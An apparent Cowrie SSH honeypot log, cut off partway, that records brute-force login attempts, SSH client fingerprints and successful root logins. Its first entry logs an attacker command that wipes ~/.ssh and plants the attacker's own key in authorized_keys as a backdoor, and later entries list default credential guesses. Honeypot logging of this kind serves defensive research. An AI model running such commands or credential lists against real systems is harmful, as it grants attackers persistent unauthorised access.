{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.413321Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.457326Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.458275Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37412,"dst_ip":"1.2.3.4","dst_port":22,"session":"e461390d3839","protocol":"ssh","message":"New connection: 212.227.235.229:37412 (1.2.3.4:22) [session: e461390d3839]","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.520989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.521673Z","src_ip":"212.227.235.229","session":"e461390d3839"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.588993Z","src_ip":"212.227.235.229","session":"e461390d3839"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.658344Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.659225Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38844,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3465ee40796","protocol":"ssh","message":"New connection: 212.227.235.229:38844 (1.2.3.4:22) [session: c3465ee40796]","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.890559Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.892108Z","src_ip":"212.227.235.229","session":"e461390d3839"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:06:28.899710Z","src_ip":"212.227.235.229","session":"c3465ee40796"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:06:29.133915Z","src_ip":"212.227.235.229","session":"c3465ee40796"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:29.959291Z","src_ip":"212.227.235.229","session":"e461390d3839"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38164,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8489ee92d5","protocol":"ssh","message":"New connection: 212.227.235.229:38164 (1.2.3.4:22) [session: 0b8489ee92d5]","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.024514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.025386Z","src_ip":"212.227.235.229","session":"0b8489ee92d5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.092636Z","src_ip":"212.227.235.229","session":"c3465ee40796"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.093179Z","src_ip":"212.227.235.229","session":"0b8489ee92d5"}
{"eventid":"cowrie.login.failed","username":"debian","password":"letmein","message":"login attempt [debian/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.180585Z","src_ip":"212.227.125.160","session":"e6bb1073d531"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.400342Z","src_ip":"212.227.235.229","session":"0b8489ee92d5"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.468724Z","src_ip":"212.227.235.229","session":"0b8489ee92d5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:30.469850Z","src_ip":"212.227.235.229","session":"c1af878e7772"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63238,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2a7634de017","protocol":"ssh","message":"New connection: 212.227.235.229:63238 (1.2.3.4:22) [session: f2a7634de017]","sensor":"my-vps","timestamp":"2025-08-31T01:06:31.119185Z"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:31.334980Z","src_ip":"212.227.235.229","session":"c3465ee40796"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40176,"dst_ip":"1.2.3.4","dst_port":22,"session":"fef7e5003eb6","protocol":"ssh","message":"New connection: 212.227.235.229:40176 (1.2.3.4:22) [session: fef7e5003eb6]","sensor":"my-vps","timestamp":"2025-08-31T01:06:31.573153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:06:31.579836Z","src_ip":"212.227.235.229","session":"fef7e5003eb6"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:31.737897Z","src_ip":"212.227.125.160","session":"e6bb1073d531"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:06:31.817946Z","src_ip":"212.227.235.229","session":"fef7e5003eb6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:06:32.776740Z","src_ip":"212.227.235.229","session":"fef7e5003eb6"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:33.023877Z","src_ip":"212.227.235.229","session":"0b16160ec32f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:33.025193Z","src_ip":"212.227.235.229","session":"fef7e5003eb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49564,"dst_ip":"1.2.3.4","dst_port":22,"session":"aecfd9abb0ef","protocol":"ssh","message":"New connection: 212.227.125.160:49564 (1.2.3.4:22) [session: aecfd9abb0ef]","sensor":"my-vps","timestamp":"2025-08-31T01:06:33.215081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:33.217553Z","src_ip":"212.227.125.160","session":"aecfd9abb0ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:33.289102Z","src_ip":"212.227.125.160","session":"aecfd9abb0ef"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:33.685945Z","src_ip":"212.227.125.160","session":"aecfd9abb0ef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:34.830748Z","src_ip":"212.227.125.160","session":"aecfd9abb0ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60392,"dst_ip":"1.2.3.4","dst_port":22,"session":"993c0b514a3a","protocol":"ssh","message":"New connection: 212.227.125.160:60392 (1.2.3.4:22) [session: 993c0b514a3a]","sensor":"my-vps","timestamp":"2025-08-31T01:06:43.561105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:43.561901Z","src_ip":"212.227.125.160","session":"993c0b514a3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:43.635698Z","src_ip":"212.227.125.160","session":"993c0b514a3a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:43.857251Z","src_ip":"212.227.125.160","session":"993c0b514a3a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:44.450185Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:44.450943Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:44.972183Z","src_ip":"212.227.125.160","session":"993c0b514a3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36752,"dst_ip":"1.2.3.4","dst_port":22,"session":"8837cd205a00","protocol":"ssh","message":"New connection: 212.227.125.160:36752 (1.2.3.4:22) [session: 8837cd205a00]","sensor":"my-vps","timestamp":"2025-08-31T01:06:54.006655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:06:54.007642Z","src_ip":"212.227.125.160","session":"8837cd205a00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:06:54.081514Z","src_ip":"212.227.125.160","session":"8837cd205a00"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:06:54.330942Z","src_ip":"212.227.125.160","session":"8837cd205a00"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:06:55.483056Z","src_ip":"212.227.125.160","session":"8837cd205a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54440,"dst_ip":"1.2.3.4","dst_port":22,"session":"41d8407774ae","protocol":"ssh","message":"New connection: 212.227.125.160:54440 (1.2.3.4:22) [session: 41d8407774ae]","sensor":"my-vps","timestamp":"2025-08-31T01:07:04.400697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:04.401614Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-